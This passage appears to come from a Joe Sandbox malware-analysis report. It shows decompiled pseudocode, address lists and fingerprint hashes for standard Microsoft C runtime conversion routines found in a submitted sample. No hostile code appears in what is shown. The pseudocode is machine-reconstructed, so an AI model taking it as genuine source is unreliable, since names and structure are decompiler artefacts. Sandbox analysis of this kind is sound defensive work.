									_v36 = 1;
								}
								_v40 = _v36;
								__eflags = _v40;
								if(__eflags == 0) {
									_t111 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x83, 0, L"%ls", L"(\"Buffer too small\", 0)");
									_t182 = _t182 + 0x18;
									__eflags = _t111 - 1;
									if(_t111 == 1) {
										asm("int3");
									}
								}
								__eflags = _v40;
								if(_v40 != 0) {
									goto L55;
								} else {
									 *((intOrPtr*)(L00992F70(_t154))) = 0x22;
									E00992900(L"(\"Buffer too small\", 0)", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x83, 0);
									_v64 = 0x22;
									E00977230( &_v96);
									return _v64;
								}
							}
							__eflags = _v32;
							if(_v32 == 0) {
								__eflags = _a4;
								if(_a4 != 0) {
									 *_a4 = _v8;
								}
								_v72 = 0;
								E00977230( &_v96);
								return _v72;
							}
							goto L42;
						}
						__eflags = (_a16 & 0x0000ffff) - 0xff;
						if((_a16 & 0x0000ffff) <= 0xff) {
							__eflags = _a8;
							if(_a8 == 0) {
								L37:
								__eflags = _a4;
								if(_a4 != 0) {
									 *_a4 = 1;
								}
								_v60 = 0;
								E00977230( &_v96);
								return _v60;
							}
							__eflags = _a12;
							if(_a12 <= 0) {
								_v24 = 0;
							} else {
								_v24 = 1;
							}
							_v28 = _v24;
							__eflags = _v28;
							if(__eflags == 0) {
								_t125 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x60, 0, L"%ls", L"destination_count > 0");
								_t181 = _t181 + 0x18;
								__eflags = _t125 - 1;
								if(_t125 == 1) {
									asm("int3");
								}
							}
							__eflags = _v28;
							if(_v28 != 0) {
								 *_a8 = _a16;
								goto L37;
							} else {
								 *((intOrPtr*)(L00992F70(_t151))) = 0x22;
								E00992900(L"destination_count > 0", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x60, 0);
								_v56 = 0x22;
								E00977230( &_v96);
								return _v56;
							}
						}
						__eflags = _a8;
						if(_a8 != 0) {
							__eflags = _a12;
							if(_a12 > 0) {
								_t151 = _a12;
								E0095AF80(_t179, _a8, 0, _a12);
							}
						}
						 *((intOrPtr*)(L00992F70(_t151))) = 0x2a;
						_v52 = 0x2a;
						E00977230( &_v96);
						return _v52;
					}
					_v80 = 0;
					_v76 = 0;
					_t163 =  &_v80;
					_v20 = E009B9E00(_a8, _a16 & 0x0000ffff,  &_v80);
					__eflags = _a4;
					if(_a4 != 0) {
						_t163 = _a4;
						 *_a4 = _v20;
					}
					__eflags = _v20 - 4;
					if(_v20 > 4) {
						_v48 =  *((intOrPtr*)(L00992F70(_t163)));
						E00977230( &_v96);
						return _v48;
					} else {
						_v44 = 0;
						E00977230( &_v96);
						return _v44;
					}
				} else {
					 *((intOrPtr*)(L00992F70(_t146))) = 0x16;
					E00992900(L"destination_count <= INT_MAX", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x34, 0);
					return 0x16;
				}
			}


































                      0x009a5af0
                      0x009a5af0
                      0x009a5af0
                      0x009a5afc
                      0x009a5b08
                      0x009a5b0d
                      0x009a5b0d
                      0x00000000
                      0x009a5b13
                      0x009a5b1a
                      0x009a5b1e
                      0x009a5b20
                      0x009a5b23
                      0x009a5b23
                      0x009a5b29
                      0x009a5b30
                      0x009a5b3b
                      0x009a5b32
                      0x009a5b32
                      0x009a5b32
                      0x009a5b45
                      0x009a5b48
                      0x009a5b4c
                      0x009a5b63
                      0x009a5b68
                      0x009a5b6b
                      0x009a5b6e
                      0x009a5b70
                      0x009a5b70
                      0x009a5b6e
                      0x009a5b71
                      0x009a5b75
                      0x009a5bae
                      0x009a5bbb
                      0x009a5bbd
                      0x009a5bc4
                      0x009a5c35
                      0x009a5c3e
                      0x009a5c46
                      0x009a5d5c
                      0x009a5d83
                      0x009a5d87
                      0x009a5d8c
                      0x009a5d8f
                      0x009a5d92
                      0x009a5d96
                      0x009a5da2
                      0x009a5da2
                      0x009a5da6
                      0x009a5e62
                      0x009a5e67
                      0x009a5e6d
                      0x009a5e77
                      0x00000000
                      0x009a5e7c
                      0x009a5dac
                      0x009a5db2
                      0x009a5db5
                      0x00000000
                      0x00000000
                      0x009a5dbb
                      0x009a5dbf
                      0x009a5dc1
                      0x009a5dc5
                      0x009a5dd1
                      0x009a5dd6
                      0x009a5dd6
                      0x009a5dc5
                      0x009a5dd9
                      0x009a5dd9
                      0x009a5ddb
                      0x009a5de6
                      0x009a5ddd
                      0x009a5ddd
                      0x009a5ddd
                      0x009a5df0
                      0x009a5df3
                      0x009a5df7
                      0x009a5e11
                      0x009a5e16
                      0x009a5e19
                      0x009a5e1c
                      0x009a5e1e
                      0x009a5e1e
                      0x009a5e1c
                      0x009a5e1f
                      0x009a5e23
                      0x00000000
                      0x009a5e25
                      0x009a5e2a
                      0x009a5e46
                      0x009a5e4e
                      0x009a5e58
                      0x00000000
                      0x009a5e5d
                      0x009a5e23
                      0x009a5d98
                      0x009a5d9c
                      0x009a5e81
                      0x009a5e85
                      0x009a5e8d
                      0x009a5e8d
                      0x009a5e8f
                      0x009a5e99
                      0x00000000
                      0x009a5e9e
                      0x00000000
                      0x009a5d9c
                      0x009a5c50
                      0x009a5c55
                      0x009a5c97
                      0x009a5c9b
                      0x009a5d31
                      0x009a5d31
                      0x009a5d35
                      0x009a5d3a
                      0x009a5d3a
                      0x009a5d40
                      0x009a5d4a
                      0x00000000
                      0x009a5d4f
                      0x009a5ca1
                      0x009a5ca5
                      0x009a5cb0
                      0x009a5ca7
                      0x009a5ca7
                      0x009a5ca7
                      0x009a5cba
                      0x009a5cbd
                      0x009a5cc1
                      0x009a5cd8
                      0x009a5cdd
                      0x009a5ce0
                      0x009a5ce3
                      0x009a5ce5
                      0x009a5ce5
                      0x009a5ce3
                      0x009a5ce6
                      0x009a5cea
                      0x009a5d2f
                      0x00000000
                      0x009a5cec
                      0x009a5cf1
                      0x009a5d0a
                      0x009a5d12
                      0x009a5d1c
                      0x00000000
                      0x009a5d21
                      0x009a5cea
                      0x009a5c57
                      0x009a5c5b
                      0x009a5c5d
                      0x009a5c61
                      0x009a5c63
                      0x009a5c6d
                      0x009a5c72
                      0x009a5c61
                      0x009a5c7a
                      0x009a5c80
                      0x009a5c8a
                      0x00000000
                      0x009a5c8f
                      0x009a5bc8
                      0x009a5bcb
                      0x009a5bce
                      0x009a5be3
                      0x009a5be6
                      0x009a5bea
                      0x009a5bec
                      0x009a5bf2
                      0x009a5bf2
                      0x009a5bf4
                      0x009a5bf8
                      0x009a5c1a
                      0x009a5c20
                      0x00000000
                      0x009a5bfa
                      0x009a5bfa
                      0x009a5c04
                      0x00000000
                      0x009a5c09
                      0x009a5b77
                      0x009a5b7c
                      0x009a5b95
                      0x00000000
                      0x009a5b9d

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$"$%ls$("Buffer too small", 0)$*$*$_wctomb_s_l$destination_count <= INT_MAX$destination_count > 0$minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
                      • API String ID: 0-2198373435
                      • Opcode ID: a0fa4cb149edeaa24ec89e42842e4948cf9dca5972b661cf1cca62b6ab416b84
                      • Instruction ID: 90766fa96a00a8628042bd6860d84fb40a68b06e78ec8e261c32ba10ef1f1b58
                      • Opcode Fuzzy Hash: a0fa4cb149edeaa24ec89e42842e4948cf9dca5972b661cf1cca62b6ab416b84
                      • Instruction Fuzzy Hash: AFB16C70A40608EFDF24EF90D846BEE77B8AF85319F218018F5156A2D1D7B45E85CBE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009BA060 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 236COMMON
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E009BA060(void* __ecx, char* _a4, char _a8, char _a12, char _a16) {
				char _v5;
				char* _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				void* _t82;
				char _t89;
				char _t91;
				void* _t99;
				void* _t103;
				void* _t107;
				void* _t111;
				void* _t112;
				char _t136;
				void* _t149;

				_t112 = __ecx;
				if(_a4 == 0) {
					_v20 = 0;
				} else {
					_v20 = 1;
				}
				_v24 = _v20;
				_t157 = _v24;
				if(_v24 == 0) {
					_t111 = L00994930(_t157, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1d, 0, L"%ls", L"buffer != nullptr");
					_t149 = _t149 + 0x18;
					if(_t111 == 1) {
						asm("int3");
					}
				}
				if(_v24 != 0) {
					__eflags = _a8;
					if(_a8 <= 0) {
						_v28 = 0;
					} else {
						_v28 = 1;
					}
					_v32 = _v28;
					__eflags = _v32;
					if(__eflags == 0) {
						_t107 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1e, 0, L"%ls", L"buffer_count > 0");
						_t149 = _t149 + 0x18;
						__eflags = _t107 - 1;
						if(_t107 == 1) {
							asm("int3");
						}
					}
					__eflags = _v32;
					if(_v32 != 0) {
						_t113 = 1;
						 *_a4 = 0;
						__eflags = _a12;
						if(_a12 <= 0) {
							_v36 = 0;
						} else {
							_t113 = _a12;
							_v36 = _a12;
						}
						__eflags = _a8 - _v36 + 1;
						if(_a8 <= _v36 + 1) {
							_v40 = 0;
						} else {
							_v40 = 1;
						}
						_v44 = _v40;
						__eflags = _v44;
						if(__eflags == 0) {
							_t103 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x21, 0, L"%ls", L"buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)");
							_t149 = _t149 + 0x18;
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								asm("int3");
							}
						}
						__eflags = _v44;
						if(_v44 != 0) {
							__eflags = _a16;
							if(_a16 == 0) {
								_v48 = 0;
							} else {
								_v48 = 1;
							}
							_v52 = _v48;
							__eflags = _v52;
							if(__eflags == 0) {
								_t99 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x22, 0, L"%ls", L"pflt != nullptr");
								_t149 = _t149 + 0x18;
								__eflags = _t99 - 1;
								if(_t99 == 1) {
									asm("int3");
								}
							}
							__eflags = _v52;
							if(_v52 != 0) {
								_v12 = _a4;
								_v16 =  *((intOrPtr*)(_a16 + 8));
								 *_v12 = 0x30;
								_t136 = _v12 + 1;
								__eflags = _t136;
								_v12 = _t136;
								while(1) {
									__eflags = _a12;
									if(_a12 <= 0) {
										break;
									}
									__eflags =  *_v16;
									if( *_v16 == 0) {
										_v5 = 0x30;
									} else {
										_v5 =  *_v16;
										_v16 = _v16 + 1;
									}
									 *_v12 = _v5;
									_v12 = _v12 + 1;
									_a12 = _a12 - 1;
								}
								 *_v12 = 0;
								__eflags = _a12;
								if(_a12 < 0) {
									L47:
									__eflags =  *_a4 - 0x31;
									if( *_a4 != 0x31) {
										_t82 = E00992E00(_a4 + 1);
										__eflags = _a4 + 1;
										E0095B590(_a4, _a4 + 1, _t82 + 1);
									} else {
										 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_a16 + 4)) + 1;
									}
									__eflags = 0;
									return 0;
								}
								__eflags =  *_v16 - 0x35;
								if( *_v16 < 0x35) {
									goto L47;
								}
								_t89 = _v12 - 1;
								__eflags = _t89;
								_v12 = _t89;
								while(1) {
									__eflags =  *_v12 - 0x39;
									if( *_v12 != 0x39) {
										break;
									}
									 *_v12 = 0x30;
									_v12 = _v12 - 1;
								}
								_t91 =  *_v12 + 1;
								__eflags = _t91;
								 *_v12 = _t91;
								goto L47;
							} else {
								 *((intOrPtr*)(L00992F70(_t113))) = 0x16;
								E00992900(L"pflt != nullptr", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x22, 0);
								return 0x16;
							}
						} else {
							 *((intOrPtr*)(L00992F70(_t113))) = 0x22;
							E00992900(L"buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x21, 0);
							return 0x22;
						}
					} else {
						 *((intOrPtr*)(L00992F70(_t112))) = 0x16;
						E00992900(L"buffer_count > 0", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1e, 0);
						return 0x16;
					}
				}
				 *((intOrPtr*)(L00992F70(_t112))) = 0x16;
				E00992900(L"buffer != nullptr", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1d, 0);
				return 0x16;
			}

























                      0x009ba060
                      0x009ba06c
                      0x009ba077
                      0x009ba06e
                      0x009ba06e
                      0x009ba06e
                      0x009ba081
                      0x009ba084
                      0x009ba088
                      0x009ba09f
                      0x009ba0a4
                      0x009ba0aa
                      0x009ba0ac
                      0x009ba0ac
                      0x009ba0aa
                      0x009ba0b1
                      0x009ba0e3
                      0x009ba0e7
                      0x009ba0f2
                      0x009ba0e9
                      0x009ba0e9
                      0x009ba0e9
                      0x009ba0fc
                      0x009ba0ff
                      0x009ba103
                      0x009ba11a
                      0x009ba11f
                      0x009ba122
                      0x009ba125
                      0x009ba127
                      0x009ba127
                      0x009ba125
                      0x009ba128
                      0x009ba12c
                      0x009ba15e
                      0x009ba169
                      0x009ba16d
                      0x009ba171
                      0x009ba17b
                      0x009ba173
                      0x009ba173
                      0x009ba176
                      0x009ba176
                      0x009ba188
                      0x009ba18b
                      0x009ba196
                      0x009ba18d
                      0x009ba18d
                      0x009ba18d
                      0x009ba1a0
                      0x009ba1a3
                      0x009ba1a7
                      0x009ba1be
                      0x009ba1c3
                      0x009ba1c6
                      0x009ba1c9
                      0x009ba1cb
                      0x009ba1cb
                      0x009ba1c9
                      0x009ba1cc
                      0x009ba1d0
                      0x009ba202
                      0x009ba206
                      0x009ba211
                      0x009ba208
                      0x009ba208
                      0x009ba208
                      0x009ba21b
                      0x009ba21e
                      0x009ba222
                      0x009ba239
                      0x009ba23e
                      0x009ba241
                      0x009ba244
                      0x009ba246
                      0x009ba246
                      0x009ba244
                      0x009ba247
                      0x009ba24b
                      0x009ba280
                      0x009ba289
                      0x009ba28f
                      0x009ba295
                      0x009ba295
                      0x009ba298
                      0x009ba29b
                      0x009ba29b
                      0x009ba29f
                      0x00000000
                      0x00000000
                      0x009ba2a7
                      0x009ba2a9
                      0x009ba2be
                      0x009ba2ab
                      0x009ba2b0
                      0x009ba2b9
                      0x009ba2b9
                      0x009ba2c8
                      0x009ba2d0
                      0x009ba2d9
                      0x009ba2d9
                      0x009ba2e1
                      0x009ba2e4
                      0x009ba2e8
                      0x009ba328
                      0x009ba32e
                      0x009ba331
                      0x009ba34b
                      0x009ba35a
                      0x009ba362
                      0x009ba333
                      0x009ba33f
                      0x009ba33f
                      0x009ba36a
                      0x00000000
                      0x009ba36a
                      0x009ba2f0
                      0x009ba2f3
                      0x00000000
                      0x00000000
                      0x009ba2f8
                      0x009ba2f8
                      0x009ba2fb
                      0x009ba2fe
                      0x009ba304
                      0x009ba307
                      0x00000000
                      0x00000000
                      0x009ba30c
                      0x009ba315
                      0x009ba315
                      0x009ba320
                      0x009ba320
                      0x009ba326
                      0x00000000
                      0x009ba24d
                      0x009ba252
                      0x009ba26b
                      0x00000000
                      0x009ba273
                      0x009ba1d2
                      0x009ba1d7
                      0x009ba1f0
                      0x00000000
                      0x009ba1f8
                      0x009ba12e
                      0x009ba133
                      0x009ba14c
                      0x00000000
                      0x009ba154
                      0x009ba12c
                      0x009ba0b8
                      0x009ba0d1
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: %ls$0$__acrt_fp_strflt_to_string$buffer != nullptr$buffer_count > 0$buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)$minkernel\crts\ucrt\src\appcrt\convert\_fptostr.cpp$pflt != nullptr
                      • API String ID: 4218353326-3579526835
                      • Opcode ID: 89895df89eba9ee91e20b42ff85cbcba33f7179249d34f86d186cd06dbbe07ec
                      • Instruction ID: 8c1aaf8e10a80284dad9e12e510471dd7197f5ae63fb0b568b62afae23ced3e2
                      • Opcode Fuzzy Hash: 89895df89eba9ee91e20b42ff85cbcba33f7179249d34f86d186cd06dbbe07ec
                      • Instruction Fuzzy Hash: F3916D70E4430CAFDF10DF98CD56BEE7BB4AB95719F108459E9106B382C3B69981CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009A76D0 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 234COMMON
                      Download Yara Rule
                      C-Code - Quality: 94%
                      			E009A76D0(void* __ebx, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				char* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				intOrPtr _t124;
				signed int _t150;
				void* _t157;
				void* _t159;
				signed int _t174;
				signed int _t189;
				signed int _t201;
				signed int _t213;
				void* _t230;
				void* _t231;

				_t230 = __esi;
				_t159 = __ebx;
				if(_a12 <= 0) {
					_v20 = 0;
				} else {
					_v20 = _a12;
				}
				_t161 = _v20 + 9;
				if(_a8 <= _v20 + 9) {
					_v24 = 0;
				} else {
					_v24 = 1;
				}
				_v28 = _v24;
				_t238 = _v28;
				if(_v28 == 0) {
					_t157 = L00994930(_t238, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x79, 0, L"%ls", L"result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)");
					_t231 = _t231 + 0x18;
					if(_t157 == 1) {
						asm("int3");
					}
				}
				if(_v28 != 0) {
					L00976CC0(_t159,  &_v68, _t230, _a32);
					__eflags = _a28 & 0x000000ff;
					if((_a28 & 0x000000ff) != 0) {
						__eflags =  *_a24 - 0x2d;
						if( *_a24 != 0x2d) {
							_v32 = 0;
						} else {
							_v32 = 1;
						}
						_v48 = _a4 + _v32;
						__eflags = _a12;
						if(_a12 <= 0) {
							_v36 = 0;
						} else {
							_v36 = 1;
						}
						L009A7F10(_a4, _a8, _v48, _v36);
						_t231 = _t231 + 0x10;
					}
					_v8 = _a4;
					__eflags =  *_a24 - 0x2d;
					if( *_a24 == 0x2d) {
						 *_v8 = 0x2d;
						_t150 = _v8 + 1;
						__eflags = _t150;
						_v8 = _t150;
					}
					__eflags = _a12;
					if(_a12 > 0) {
						_t38 = _v8 + 1; // 0xe58b24c4
						 *_v8 =  *_t38;
						_t189 = _v8 + 1;
						__eflags = _t189;
						_v8 = _t189;
						 *_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E00977A60( &_v68))) + 0x88))))));
					}
					__eflags = _a28 & 0x000000ff;
					if((_a28 & 0x000000ff) == 0) {
						_v40 = 1;
					} else {
						_v40 = 0;
					}
					_v8 = _v8 + _a12 + _v40;
					__eflags = _a8 - 0xffffffff;
					if(_a8 != 0xffffffff) {
						_t201 = _a8 - _v8 - _a4;
						__eflags = _t201;
						_v44 = _t201;
					} else {
						_v44 = _a8;
					}
					E00994A20(E00992DE0(_v8, _v44, "e+000"), _t121, L"strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), \"e+000\")", L"fp_format_e_internal", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x9c, 0);
					_v16 = _v8 + 2;
					__eflags = _a16 & 0x000000ff;
					if((_a16 & 0x000000ff) != 0) {
						 *_v8 = 0x45;
					}
					_v8 = _v8 + 1;
					_t124 = _a24;
					__eflags =  *((char*)( *((intOrPtr*)(_t124 + 8)))) - 0x30;
					if( *((char*)( *((intOrPtr*)(_t124 + 8)))) != 0x30) {
						_t174 =  *((intOrPtr*)(_a24 + 4)) - 1;
						__eflags = _t174;
						_v12 = _t174;
						if(_t174 < 0) {
							_v12 =  ~_v12;
							 *_v8 = 0x2d;
						}
						_v8 = _v8 + 1;
						__eflags = _v12 - 0x64;
						if(_v12 >= 0x64) {
							asm("cdq");
							 *_v8 =  *_v8 + _v12 / 0x64;
							asm("cdq");
							_t86 = _v12 % 0x64;
							__eflags = _t86;
							_v12 = _t86;
						}
						_v8 = _v8 + 1;
						__eflags = _v12 - 0xa;
						if(_v12 >= 0xa) {
							asm("cdq");
							 *_v8 =  *_v8 + _v12 / 0xa;
							asm("cdq");
							_t102 = _v12 % 0xa;
							__eflags = _t102;
							_v12 = _t102;
						}
						_v8 = _v8 + 1;
						_t213 =  *_v8 + _v12;
						__eflags = _t213;
						 *_v8 = _t213;
					}
					__eflags = _a20 - 2;
					if(_a20 == 2) {
						__eflags =  *_v16 - 0x30;
						if( *_v16 == 0x30) {
							__eflags = _v16 + 1;
							E0095B590(_v16, _v16 + 1, 3);
						}
					}
					_v52 = 0;
					E00977230( &_v68);
					return _v52;
				}
				 *((intOrPtr*)(L00992F70(_t161))) = 0x22;
				E00992900(L"result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)", L"fp_format_e_internal", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x79, 0);
				return 0x22;
			}


























                      0x009a76d0
                      0x009a76d0
                      0x009a76dc
                      0x009a76e6
                      0x009a76de
                      0x009a76e1
                      0x009a76e1
                      0x009a76f0
                      0x009a76f6
                      0x009a7701
                      0x009a76f8
                      0x009a76f8
                      0x009a76f8
                      0x009a770b
                      0x009a770e
                      0x009a7712
                      0x009a7729
                      0x009a772e
                      0x009a7734
                      0x009a7736
                      0x009a7736
                      0x009a7734
                      0x009a773b
                      0x009a7774
                      0x009a777d
                      0x009a777f
                      0x009a7784
                      0x009a7787
                      0x009a7792
                      0x009a7789
                      0x009a7789
                      0x009a7789
                      0x009a779f
                      0x009a77a2
                      0x009a77a6
                      0x009a77b1
                      0x009a77a8
                      0x009a77a8
                      0x009a77a8
                      0x009a77c8
                      0x009a77cd
                      0x009a77cd
                      0x009a77d3
                      0x009a77d9
                      0x009a77dc
                      0x009a77e1
                      0x009a77e7
                      0x009a77e7
                      0x009a77ea
                      0x009a77ea
                      0x009a77ed
                      0x009a77f1
                      0x009a77f9
                      0x009a77fc
                      0x009a7801
                      0x009a7801
                      0x009a7804
                      0x009a781e
                      0x009a781e
                      0x009a7824
                      0x009a7826
                      0x009a7831
                      0x009a7828
                      0x009a7828
                      0x009a7828
                      0x009a7841
                      0x009a7844
                      0x009a7848
                      0x009a785b
                      0x009a785b
                      0x009a785d
                      0x009a784a
                      0x009a784d
                      0x009a784d
                      0x009a788c
                      0x009a789a
                      0x009a78a1
                      0x009a78a3
                      0x009a78a8
                      0x009a78a8
                      0x009a78b1
                      0x009a78b4
                      0x009a78bd
                      0x009a78c0
                      0x009a78cc
                      0x009a78cc
                      0x009a78cf
                      0x009a78d2
                      0x009a78d9
                      0x009a78df
                      0x009a78df
                      0x009a78e8
                      0x009a78eb
                      0x009a78ef
                      0x009a78f4
                      0x009a790a
                      0x009a790f
                      0x009a7915
                      0x009a7915
                      0x009a7917
                      0x009a7917
                      0x009a7920
                      0x009a7923
                      0x009a7927
                      0x009a792c
                      0x009a7942
                      0x009a7947
                      0x009a794d
                      0x009a794d
                      0x009a794f
                      0x009a794f
                      0x009a7958
                      0x009a7965
                      0x009a7965
                      0x009a796a
                      0x009a796a
                      0x009a796c
                      0x009a7970
                      0x009a7978
                      0x009a797b
                      0x009a7982
                      0x009a798a
                      0x009a798f
                      0x009a797b
                      0x009a7992
                      0x009a799c
                      0x00000000
                      0x009a79a1
                      0x009a7742
                      0x009a775b
                      0x00000000

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009A7883
                      • __invoke_watson_if_error.LIBCMTD ref: 009A788C
                      Strings
                      • d, xrefs: 009A78EB
                      • %ls, xrefs: 009A7719
                      • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 009A7722, 009A774C, 009A7867
                      • result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1), xrefs: 009A7714, 009A7756
                      • e+000, xrefs: 009A7876
                      • strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), "e+, xrefs: 009A7871
                      • fp_format_e_internal, xrefs: 009A7751, 009A786C
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error
                      • String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), "e+
                      • API String ID: 4254006664-1740674501
                      • Opcode ID: d9162fb56fb0766ba7063bb19351c92e550ffaf1e2ae0bf1886917acd1b3fad8
                      • Instruction ID: b84b89b2d70cc94312fe1f57173408103545ecdcfd54f4ac00e4808b41902a8e
                      • Opcode Fuzzy Hash: d9162fb56fb0766ba7063bb19351c92e550ffaf1e2ae0bf1886917acd1b3fad8
                      • Instruction Fuzzy Hash: 2FA13F74E04248EFCF05CF98C991BAEBBB5BF86304F248199E4156B351C775AE40DB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009B5170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 141timememoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009B5170(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, short* _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				intOrPtr _v36;
